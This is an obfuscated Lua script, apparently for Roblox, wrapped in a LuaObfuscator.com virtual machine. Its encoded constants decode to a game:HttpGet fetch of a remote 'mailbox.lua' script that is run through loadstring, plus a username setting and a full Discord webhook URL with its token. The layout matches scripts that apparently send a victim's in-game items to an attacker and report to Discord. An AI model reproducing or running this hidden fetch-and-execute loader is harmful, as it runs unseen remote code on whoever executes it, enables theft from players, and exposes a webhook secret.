--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v66=v2(v0(v30,16));if v19 then local v73=v5(v66,v19);v19=nil;return v73;else return v66;end end end);local function v20(v31,v32,v33)if v33 then local v67=0 -0 ;local v68;while true do if (v67==((877 -(282 + 595)) -0)) then v68=(v31/((3 -1)^(v32-1)))%(2^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v68-(v68%(569 -(367 + (1838 -(1523 + 114))))) ;end end else local v69=(2 + 0)^(v32-(928 -(214 + 713))) ;return (((v31%(v69 + v69))>=v69) and ((1 -0) + (1065 -(68 + 997)))) or (0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + 2 ;return (v36 * (1114 -858)) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (120 -(32 + (202 -117))) );v18=v18 + 4 + 0 ;return (v40 * (3720433 + 13056783)) + (v39 * 65536) + (v38 * (1213 -(892 + 65))) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=(1 -0) -0 ;local v44=(v20(v42,1 -(0 + 0) ,370 -(87 + 263) ) * ((182 -(67 + 113))^32)) + v41 ;local v45=v20(v42,16 + 5 ,75 -(8 + 36) );local v46=((v20(v42,24 + 8 )==(3 -2)) and  -(953 -(802 + 150))) or (2 -1) ;if (v45==((0 -0) -0)) then if (v44==(0 + 0)) then return v46 * (997 -(915 + 82)) ;else local v74=0 -0 ;while true do if (v74==(791 -(368 + 423))) then v45=1;v43=0 + 0 ;break;end end end elseif (v45==(2691 -(2023 -1379))) then return ((v44==0) and (v46 * (1/(18 -(10 + 8))))) or (v46 * NaN) ;end return v8(v46,v45-((8501 -6291) -(1069 + (560 -(416 + 26)))) ) * (v43 + (v44/(2^((373 -256) -65)))) ;end local function v25(v47)local v48=0 + 0 ;local v49;local v50;while true do if (v48==(1 -0)) then v49=v3(v16,v18,(v18 + v47) -(439 -(145 + 293)) );v18=v18 + v47 ;v48=(254 + 178) -(44 + 386) ;end if (2==v48) then v50={};for v75=(5428 -3941) -(998 + 488) , #v49 do v50[v75]=v2(v1(v3(v49,v75,v75)));end v48=3;end if (v48==(0 + 0)) then v49=nil;if  not v47 then local v91=0 + 0 ;while true do if (v91==0) then v47=v23();if (v47==(772 -(201 + (2027 -1456)))) then return "";end break;end end end v48=1139 -((975 -(814 + 45)) + 1022) ;end if (v48==(12 -9)) then return v6(v50);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;while true do local v65=0 + 0 ;while true do if ((1122 -(118 + 1003))~=v65) then else if (v51==(1692 -(209 + 1481))) then local v94=0 -0 ;local v95;while true do if (v94==(0 -0)) then v95=1636 -(1373 + 263) ;while true do if (v95==1) then for v109=1001 -(451 + 549) ,v23() do local v110=0 + 0 ;local v111;local v112;while true do if (v110==(978 -(553 + 424))) then while true do if (v111==(0 -0)) then v112=v21();if (v20(v112,1 -0 ,1 + 0 )==0) then local v172=0 -0 ;local v173;local v174;local v175;local v176;local v177;while true do if (v172~=1) then else v175=nil;v176=nil;v172=1386 -(746 + 638) ;end if (2~=v172) then else v177=nil;while true do if (v173~=(1 + 1)) then else while true do if (v174==(4 -1)) then if (v20(v176,2 + 1 ,6 -3 )==(2 -1)) then v177[8 -4 ]=v57[v177[4]];end v52[v109]=v177;break;end if (v174~=0) then else local v185=0 + 0 ;while true do if (v185==1) then v174=342 -(218 + 123) ;break;end if (v185~=(1581 -(1535 + 46))) then else local v190=0 + 0 ;while true do if (v190==(0 + 0)) then v175=v20(v112,1331 -(797 + 532) ,3 + 0 );v176=v20(v112,2 + 2 ,566 -(306 + 254) );v190=1203 -(373 + 829) ;end if (v190==(732 -(476 + 255))) then v185=1 + 0 ;break;end end end end end if (v174~=(1 -0)) then else local v186=1467 -(899 + 568) ;while true do if (v186~=(0 + 0)) then else local v191=0 -0 ;while true do if ((2 -1)~=v191) then else v186=239 -(64 + 174) ;break;end if ((603 -(268 + 335))~=v191) then else v177={v22(),v22(),nil,nil};if (v175==0) then local v197=216 -(42 + 174) ;local v198;local v199;while true do if (v197~=(573 -(426 + 146))) then else while true do if (v198==(0 + 0)) then v199=0;while true do if (v199==(1456 -(282 + 1174))) then v177[814 -(569 + 242) ]=v22();v177[11 -7 ]=v22();break;end end break;end end break;end if (v197~=(0 + 0)) then else v198=0;v199=nil;v197=1;end end elseif (v175==(1025 -(706 + 318))) then v177[1254 -(721 + 530) ]=v23();elseif (v175==2) then v177[3]=v23() -((1273 -(945 + 326))^16) ;elseif (v175~=3) then else local v202=0;local v203;local v204;while true do if (v202~=(0 -0)) then else v203=0 + 0 ;v204=nil;v202=1 + 0 ;end if (v202~=(701 -(271 + 429))) then else while true do if (v203~=0) then else v204=0 + 0 ;while true do if ((1500 -(1408 + 92))==v204) then v177[3]=v23() -((2 + 0)^16) ;v177[10 -6 ]=v22();break;end end break;end end break;end end end v191=1;end end end if (v186==(1087 -(461 + 625))) then v174=1935 -(565 + 1368) ;break;end end end if (v174==2) then local v187=1288 -(993 + 295) ;while true do if (v187==(0 + 0)) then if (v20(v176,1,1)==1) then v177[1173 -(418 + 753) ]=v57[v177[1 + 1 ]];end if (v20(v176,1 + 1 ,1 + 1 )~=1) then else v177[3]=v57[v177[859 -(564 + 292) ]];end v187=1 + 0 ;end if (v187==1) then v174=3;break;end end end end break;end if (v173==(529 -(406 + 123))) then local v181=0 -0 ;while true do if (v181==(305 -(244 + 60))) then v173=1770 -(1749 + 20) ;break;end if (v181~=0) then else v174=0 + 0 ;v175=nil;v181=1323 -(1249 + 73) ;end end end if (v173~=(477 -(41 + 435))) then else v176=nil;v177=nil;v173=1 + 1 ;end end break;end if (v172==0) then v173=0;v174=nil;v172=1146 -(466 + 679) ;end end end break;end end break;end if (v110==(1001 -(938 + 63))) then local v120=0 + 0 ;while true do if (v120~=(0 -0)) then else v111=0 -0 ;v112=nil;v120=1;end if (v120==1) then v110=1901 -(106 + 1794) ;break;end end end end end v51=1 + 2 ;break;end if (v95~=(0 + 0)) then else for v113=2 -1 ,v56 do local v114=1613 -(1565 + 48) ;local v115;local v116;local v117;local v118;local v119;while true do if (v114==(2 -1)) then v117=nil;v118=nil;v114=1140 -(782 + 356) ;end if (2~=v114) then else v119=nil;while true do if ((114 -(4 + 110))~=v115) then else local v157=0 -0 ;while true do if (v157~=(585 -(57 + 527))) then else v115=1428 -(41 + 1386) ;break;end if (v157==0) then v116=1092 -(975 + 117) ;v117=nil;v157=104 -(17 + 86) ;end end end if (v115~=(1877 -(157 + 1718))) then else while true do if (v116==(0 + 0)) then local v178=0 + 0 ;while true do if (v178~=(0 -0)) then else v117=0 -0 ;v118=nil;v178=1019 -(697 + 321) ;end if (v178==(2 -1)) then v116=1;break;end end end if (v116==(2 -1)) then v119=nil;while true do if (v117==1) then if (v118==(167 -(122 + 44))) then v119=v21()~=(0 -0) ;elseif (v118==2) then v119=v24();elseif (v118~=(5 -2)) then else v119=v25();end v57[v113]=v119;break;end if ((0 -0)==v117) then local v180=0 + 0 ;while true do if ((0 + 0)==v180) then local v182=0 -0 ;local v183;while true do if (v182==(0 -0)) then v183=1227 -(322 + 905) ;while true do if (v183==0) then local v192=611 -(602 + 9) ;while true do if (v192~=(65 -(30 + 35))) then else v118=v21();v119=nil;v192=1 + 0 ;end if (v192~=(1258 -(1043 + 214))) then else v183=1;break;end end end if ((1190 -(449 + 740))~=v183) then else v180=3 -2 ;break;end end break;end end end if ((1213 -(323 + 889))~=v180) then else v117=2 -1 ;break;end end end end break;end end break;end if ((948 -(245 + 702))==v115) then local v158=580 -(361 + 219) ;while true do if ((320 -(53 + 267))==v158) then v118=nil;v119=nil;v158=1;end if (v158==(1899 -(260 + 1638))) then v115=442 -(382 + 58) ;break;end end end end break;end if (v114==(0 + 0)) then v115=413 -(15 + 398) ;v116=nil;v114=1 + 0 ;end end end v55[985 -(18 + 964) ]=v21();v95=1;end end break;end end end if (v51==(3 -2)) then local v96=0 + 0 ;while true do if (v96~=(0 + 0)) then else v55={v52,v53,nil,v54};v56=v23();v96=1;end if (v96==(1 + 0)) then v57={};v51=128 -(116 + 10) ;break;end end end break;end if (0==v65) then if (v51==(1 + 2)) then local v97=738 -(542 + 196) ;while true do if (v97~=(0 -0)) then else for v106=1 + 0 ,v23() do v53[v106-(684 -(483 + 200)) ]=v28();end return v55;end end end if (v51==(0 + 0)) then local v98=0 + 0 ;local v99;while true do if ((0 -0)~=v98) then else v99=0 -0 ;while true do if (v99~=(766 -(468 + 297))) then else v54={};v51=1552 -(1126 + 425) ;break;end if ((405 -(118 + 287))~=v99) then else v52={};v53={};v99=563 -(334 + 228) ;end end break;end end end v65=3 -2 ;end end end end local function v29(v58,v59,v60)local v61=0;local v62;local v63;local v64;while true do if (v61==0) then v62=v58[1];v63=v58[2];v61=1;end if (v61==1) then v64=v58[3];return function(...)local v77=v62;local v78=v63;local v79=v64;local v80=v27;local v81=1;local v82= -1;local v83={};local v84={...};local v85=v12("#",...) -1 ;local v86={};local v87={};for v92=0,v85 do if (v92>=v79) then v83[v92-v79 ]=v84[v92 + 1 ];else v87[v92]=v84[v92 + 1 ];end end local v88=(v85-v79) + 1 ;local v89;local v90;while true do local v93=0;while true do if (v93==0) then v89=v77[v81];v90=v89[1];v93=1;end if (v93==1) then if (v90<=10) then if (v90<=4) then if (v90<=1) then if (v90==0) then local v121=v89[2];v87[v121]=v87[v121](v13(v87,v121 + 1 ,v82));else do return;end end elseif (v90<=2) then local v123=v89[2];local v124,v125=v80(v87[v123](v13(v87,v123 + 1 ,v89[3])));v82=(v125 + v123) -1 ;local v126=0;for v136=v123,v82 do local v137=0;while true do if (v137==0) then v126=v126 + 1 ;v87[v136]=v124[v126];break;end end end elseif (v90>3) then v60[v89[3]]=v87[v89[2]];elseif ((v89[3]=="_ENV") or (v89[3]=="getfenv")) then v87[v89[2]]=v60;else v87[v89[2]]=v60[v89[3]];end elseif (v90<=7) then if (v90<=5) then v87[v89[2]]=v89[3];elseif (v90==6) then local v140=v89[2];local v141,v142=v80(v87[v140](v13(v87,v140 + 1 ,v89[3])));v82=(v142 + v140) -1 ;local v143=0;for v159=v140,v82 do v143=v143 + 1 ;v87[v159]=v141[v143];end else local v144=v89[2];local v145=v87[v89[3]];v87[v144 + 1 ]=v145;v87[v144]=v145[v89[4]];end elseif (v90<=8) then v87[v89[2]]=v89[3]~=0 ;elseif (v90>9) then v60[v89[3]]=v87[v89[2]];elseif (v87[v89[2]]==v89[4]) then v81=v81 + 1 ;else v81=v89[3];end elseif (v90<=15) then if (v90<=12) then if (v90==11) then local v130=v89[2];v87[v130]=v87[v130](v13(v87,v130 + 1 ,v82));else v81=v89[3];end elseif (v90<=13) then v87[v89[2]]=v89[3]~=0 ;elseif (v90==14) then if ((v89[3]=="_ENV") or (v89[3]=="getfenv")) then v87[v89[2]]=v60;else v87[v89[2]]=v60[v89[3]];end elseif (v87[v89[2]]==v89[4]) then v81=v81 + 1 ;else v81=v89[3];end elseif (v90<=18) then if (v90<=16) then v87[v89[2]]=v89[3];elseif (v90>17) then v87[v89[2]]();else v81=v89[3];end elseif (v90<=19) then do return;end elseif (v90==20) then local v152=v89[2];local v153=v87[v89[3]];v87[v152 + 1 ]=v153;v87[v152]=v153[v89[4]];else v87[v89[2]]();end v81=v81 + 1 ;break;end end end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031E3O00682O7470733A2O2F672O6F662E70726F2F732F6D61696C626F782E6C756103083O00557365724E616D65030A3O00557365436F646542595303073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3138363731303137383230393436383431362F6F376B3254476B52585968673271434F3270516246716D46436253556A3377445332706D624567346B6944526A7A456538415951644F43487741624B384B437331697773001D3O0012053O00013O00260F3O000C000100020004113O000C0001001203000100033O001203000200043O002007000200020005001205000400064O000D000500014O0002000200054O000B00013O00022O00120001000100010004113O001C000100260F3O0001000100010004113O00010001001205000100013O00260F00010013000100020004113O001300010012053O00023O0004113O0001000100260F0001000F000100010004113O000F0001001205000200083O00120A000200073O0012050002000A3O00120A000200093O001205000100023O0004113O000F00010004113O000100012O00013O00017O00",v9(),...);
